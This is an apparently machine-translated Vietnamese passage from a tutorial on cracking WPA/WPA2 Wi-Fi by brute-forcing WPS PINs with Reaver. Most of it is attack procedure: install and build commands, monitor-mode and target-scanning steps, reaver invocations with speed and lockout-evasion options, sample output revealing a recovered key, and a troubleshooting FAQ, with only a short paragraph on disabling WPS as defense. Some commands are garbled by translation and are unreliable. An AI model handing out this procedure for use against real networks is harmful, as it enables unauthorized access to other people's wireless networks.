Để tải xuống Reaver, chúng tôi sẽ cần có internet. Do đó, chúng tôi kết nối dây vá hoặc định cấu hình bộ điều hợp không dây (menu “Ứng dụng > Internet > Trình quản lý mạng Wicd”). Tiếp theo, chúng tôi khởi chạy trình mô phỏng thiết bị đầu cuối, nơi chúng tôi tải xuống phiên bản mới nhất của tiện ích thông qua kho lưu trữ:

# cập nhật apt-get # apt-get cài đặt reaver

Ở đây tôi phải nói rằng kho lưu trữ chứa phiên bản 1.3, phiên bản này đối với tôi không hoạt động chính xác. Sau khi tìm kiếm thông tin về vấn đề, tôi tìm được bài đăng của tác giả, trong đó khuyến nghị nên cập nhật lên phiên bản cao nhất có thể bằng cách tổng hợp các nguồn lấy từ SVN. Nhìn chung, đây là phương pháp cài đặt phổ biến nhất (đối với mọi bản phân phối).

$ svn kiểm tra http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps $ cd ./reaver-wps/src/ $ ./configure $ make # make cài đặt

Sẽ không có vấn đề gì khi lắp ráp trong BackTrack - tôi đã đích thân kiểm tra nó. Trong bản phân phối Arch Linux mà tôi sử dụng, việc cài đặt thậm chí còn đơn giản hơn nhờ sự hiện diện của PKGBUILD tương ứng:

$ yaourt -S reaver-wps-svn

Bước 3. Chuẩn bị cho vũ lực

Để sử dụng Reaver bạn cần làm như sau:

  • chuyển bộ điều hợp không dây sang chế độ giám sát;
  • tìm ra tên của giao diện không dây;
  • tìm ra địa chỉ MAC của điểm truy cập (BSSID);
  • đảm bảo rằng WPS được kích hoạt tại điểm đó.

Trước tiên, hãy kiểm tra xem giao diện không dây có trong hệ thống hay không:

#iwconfig

Nếu đầu ra của lệnh này chứa giao diện có mô tả (thường là wlan0), điều đó có nghĩa là hệ thống đã nhận dạng được bộ điều hợp (nếu nó được kết nối với mạng không dây để tải Reaver thì tốt hơn hết là ngắt kết nối). Hãy đặt bộ chuyển đổi vào chế độ giám sát:

# airmon-ng bắt đầu wlan0

Lệnh này tạo giao diện ảo ở chế độ giám sát, tên của nó sẽ được chỉ định ở đầu ra lệnh (thường là mon0). Bây giờ chúng ta cần tìm điểm truy cập để tấn công và tìm ra BSSID của nó. Hãy sử dụng tiện ích để nghe chương trình phát sóng không dây airodump-ng:

#airodump-ngmon0

Danh sách các điểm truy cập trong phạm vi sẽ xuất hiện trên màn hình. Chúng tôi quan tâm đến các điểm có mã hóa WPA/WPA2 và xác thực khóa PSK.

Tốt hơn là nên chọn một trong những người đầu tiên trong danh sách, vì cần phải giao tiếp tốt với điểm để thực hiện một cuộc tấn công. Nếu có nhiều điểm và danh sách không vừa với màn hình, thì bạn có thể sử dụng một tiện ích nổi tiếng khác - kismet, nơi có giao diện phù hợp hơn về mặt này. Tùy chọn, bạn có thể kiểm tra tại chỗ xem cơ chế WPS có được bật tại thời điểm của chúng tôi hay không. Để thực hiện việc này, Reaver đi kèm với (nhưng chỉ khi bạn lấy nó từ SVN) tiện ích rửa:

# ./wash -i mon0

Tham số là tên của giao diện được chuyển sang chế độ giám sát. Bạn cũng có thể sử dụng tùy chọn '-f' và cung cấp cho tiện ích một tệp giới hạn được tạo, chẳng hạn như bởi cùng một airodump-ng. Vì một số lý do không xác định, gói Reaver trong BackTrack không bao gồm tiện ích rửa. Hãy hy vọng lỗi này sẽ được sửa chữa vào thời điểm bài viết này được xuất bản.

Bước 4. Chạy vũ phu

Bây giờ bạn có thể tiến hành trực tiếp để tìm kiếm mã PIN của mình. Để khởi động Reaver trong trường hợp đơn giản nhất, bạn không cần nhiều thứ. Bạn chỉ cần chỉ định tên của giao diện (trước đây chúng tôi đã chuyển sang chế độ giám sát) và BSSID của điểm truy cập:

# reaver -i mon0 -b 00:21:29:74:67:50 -vv

Công tắc "-vv" cho phép đầu ra chương trình nâng cao để chúng tôi có thể đảm bảo mọi thứ hoạt động như mong đợi.

Reaver v1.4 Công cụ tấn công thiết lập bảo vệ WiFi Bản quyền (c) 2011, Giải pháp mạng chiến thuật, Craig Heffner [+] Đang chờ đèn hiệu từ 00:21:29:74:67:50 [+] Liên kết với 00:21:29:74:67:50 (ESSID: linksys) [+] Đang thử mã pin 63979978

Nếu chương trình liên tục gửi mã PIN đến điểm truy cập, điều đó có nghĩa là mọi thứ đã bắt đầu tốt đẹp và tất cả những gì còn lại là chờ đợi một cách ngu ngốc. Quá trình này có thể mất một thời gian dài. Thời gian ngắn nhất mà tôi có thể ép buộc nhập mã PIN là khoảng năm giờ. Ngay sau khi được chọn, chương trình sẽ vui vẻ thông báo cho bạn về điều đó:

[+] Đang thử mã pin 64637129 [+] Khóa bị bẻ khóa sau 13654 giây [+] Mã PIN WPS: "64637129" [+] WPA PSK: "MyH0rseThink$YouStol3HisCarrot!" [+] AP SSID: "linksys"

Tất nhiên, thứ có giá trị nhất ở đây là khóa WPA-PSK, bạn có thể sử dụng ngay để kết nối. Mọi thứ đơn giản đến mức nó thậm chí không vừa với đầu bạn.


Có thể tự vệ được không?

Hiện tại, chỉ có một cách để bảo vệ bạn khỏi một cuộc tấn công - tắt WPS trong cài đặt bộ định tuyến. Tuy nhiên, hóa ra, điều này không phải lúc nào cũng có thể thực hiện được. Vì lỗ hổng bảo mật không tồn tại ở cấp độ triển khai mà ở cấp độ giao thức, bạn không nên mong đợi một bản vá nhanh chóng từ các nhà sản xuất sẽ giải quyết được tất cả các vấn đề. Điều họ có thể làm nhất bây giờ là chống lại vũ lực càng nhiều càng tốt. Ví dụ: nếu bạn chặn WPS trong một giờ sau năm lần nhập mã PIN không thành công thì quá trình tìm kiếm sẽ mất khoảng 90 ngày. Nhưng một câu hỏi khác là, làm thế nào một bản vá như vậy có thể được tung ra cho hàng triệu thiết bị hoạt động trên toàn thế giới?

Nâng cấp Reaver

Trong HOWTO, chúng tôi đã trình bày cách đơn giản và linh hoạt nhất để sử dụng tiện ích Reaver. Tuy nhiên, việc triển khai WPS khác nhau tùy theo nhà sản xuất, vì vậy trong một số trường hợp cần có cấu hình bổ sung. Dưới đây tôi sẽ cung cấp các tùy chọn bổ sung có thể tăng tốc độ và hiệu quả tìm kiếm khóa.

  1. Bạn có thể đặt số kênh và SSID của điểm truy cập: # reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
  2. Tùy chọn '—dh-small' có tác dụng có lợi đối với tốc độ mạnh mẽ, vì nó đặt một giá trị nhỏ cho khóa bí mật, từ đó tạo điều kiện thuận lợi cho việc tính toán ở phía điểm truy cập: # reaver -i mon0 -b 00:01:02: 03:04:05 -vv - -dh-nhỏ
  3. Thời gian chờ phản hồi mặc định là năm giây. Nếu cần, bạn có thể thay đổi: # reaver -i mon0 -b 00:01:02:03:04:05 -t 2
  4. Độ trễ mặc định giữa các lần thử là một giây. Nó cũng có thể được cấu hình: # reaver -i mon0 -b 00:01:02:03:04:05 -d 0
  5. Một số điểm truy cập có thể chặn WPS trong một thời gian nhất định vì nghi ngờ rằng chúng đang bị lừa đảo. Reaver nhận thấy tình huống này và tạm dừng tìm kiếm trong 315 giây theo mặc định, thời lượng tạm dừng này có thể thay đổi: # reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
  6. Một số cách triển khai giao thức WPS sẽ chấm dứt kết nối nếu mã PIN không chính xác, mặc dù theo đặc điểm kỹ thuật, chúng sẽ trả về một thông báo đặc biệt. Reaver tự động nhận ra tình huống này, vì điều này có tùy chọn ‘—nack’: # reaver -i mon0 -b 00:01:02:03:04:05 --nack
  7. Tùy chọn '--eap-terminate' nhằm mục đích hoạt động với những AP yêu cầu chấm dứt phiên WPS bằng thông báo EAP FAIL: # reaver -i mon0 -b 00:01:02:03:04:05 --eap -chấm dứt
  8. Việc xảy ra lỗi trong phiên WPS có thể có nghĩa là AP đang hạn chế số lần thử nhập mã PIN hoặc đơn giản là bị quá tải với các yêu cầu. Thông tin về điều này sẽ được hiển thị trên màn hình. Trong trường hợp này, Reaver tạm dừng hoạt động của nó và thời gian tạm dừng có thể được đặt bằng tùy chọn '--fail-wait': # reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait =360

Câu hỏi thường gặp

Câu hỏi: Cần có bộ chuyển đổi không dây nào để hack?

Trả lời: Trước khi thử nghiệm, bạn cần đảm bảo rằng bộ điều hợp không dây có thể hoạt động ở chế độ giám sát. Cách tốt nhất là kiểm tra danh sách phần cứng được hỗ trợ trên trang web của dự án Aircrack-ng. Nếu câu hỏi đặt ra là nên mua mô-đun không dây nào, thì bạn có thể bắt đầu với bất kỳ bộ chuyển đổi nào dựa trên chipset RTL8187L. Bạn có thể dễ dàng tìm thấy USB dongle trên Internet với giá 20 USD.

Câu hỏi: Tại sao tôi gặp lỗi "hết thời gian chờ" và "không đúng thứ tự"?

Trả lời: Điều này thường xảy ra do cường độ tín hiệu yếu và khả năng giao tiếp với điểm truy cập kém. Ngoài ra, điểm truy cập có thể tạm thời chặn việc sử dụng WPS.

Câu hỏi: Tại sao việc giả mạo địa chỉ MAC không có tác dụng với tôi?

Trả lời: Có thể bạn sẽ giả mạo MAC của giao diện ảo mon0 và cách này sẽ không hiệu quả. Bạn phải chỉ định tên của giao diện thực, ví dụ: wlan0.

Câu hỏi: Tại sao Reaver hoạt động kém khi tín hiệu kém, mặc dù việc hack WEP tương tự vẫn hoạt động tốt?

Trả lời: Việc bẻ khóa WEP thường xảy ra bằng cách truyền lại các gói đã bắt được để thu được nhiều vectơ khởi tạo (IV) cần thiết để bẻ khóa thành công. Trong trường hợp này, việc gói tin nào bị mất hoặc bị hư hỏng trên đường đi không thành vấn đề. Nhưng để tấn công WPS, bạn phải tuân thủ nghiêm ngặt giao thức truyền gói tin giữa access point và Reaver để kiểm tra từng mã PIN. Và nếu cùng lúc đó một số gói bị mất hoặc đến ở dạng không đứng đắn, thì bạn sẽ phải thiết lập lại phiên WPS. Điều này khiến các cuộc tấn công vào WPS phụ thuộc nhiều hơn vào cường độ tín hiệu. Điều quan trọng cần nhớ là chỉ vì bộ điều hợp không dây của bạn nhìn thấy điểm truy cập, điều này không có nghĩa là điểm truy cập đó nhìn thấy bạn. Vì vậy, nếu bạn là chủ sở hữu vui vẻ của bộ chuyển đổi công suất cao từ Mạng ALFA và ăng-ten vài chục dBi, thì đừng mong đợi có thể phá vỡ tất cả các điểm truy cập bị bắt.

Câu hỏi: Reaver luôn gửi cùng một mã PIN đến điểm truy cập, có chuyện gì vậy?

Trả lời: Kiểm tra xem WPS đã được kích hoạt trên bộ định tuyến chưa. Điều này có thể được thực hiện bằng cách sử dụng tiện ích wash: chạy nó và kiểm tra xem mục tiêu của bạn có trong danh sách hay không.

Câu hỏi: Tại sao tôi không thể liên kết với điểm truy cập?

Trả lời: Điều này có thể là do cường độ tín hiệu kém hoặc do bộ chuyển đổi của bạn không phù hợp cho nghiên cứu đó.

Câu hỏi: Tại sao tôi liên tục gặp lỗi "phát hiện giới hạn tốc độ"? Trả lời: Điều này là do điểm truy cập đã chặn WPS. Thông thường đây là lệnh chặn tạm thời (khoảng năm phút), nhưng trong một số trường hợp, họ có thể áp dụng lệnh cấm vĩnh viễn (chỉ bỏ chặn thông qua bảng quản trị). Có một lỗi khó chịu trong phiên bản Reaver 1.3, do đó không phát hiện được việc loại bỏ các khóa như vậy. Để giải quyết vấn đề này, họ khuyên bạn nên sử dụng tùy chọn ‘—ignore-locks’ hoặc tải xuống phiên bản mới nhất từ ​​SVN.

Câu hỏi: Tôi có thể chạy hai hoặc nhiều phiên bản Reaver cùng lúc để tăng tốc độ tấn công của mình không?

Trả lời: Về mặt lý thuyết thì có thể, nhưng nếu chúng tấn công cùng một điểm truy cập thì tốc độ tìm kiếm khó có thể tăng lên, vì trong trường hợp này nó bị hạn chế bởi phần cứng yếu của điểm truy cập, vốn đã được tải đầy đủ ngay cả với một kẻ tấn công .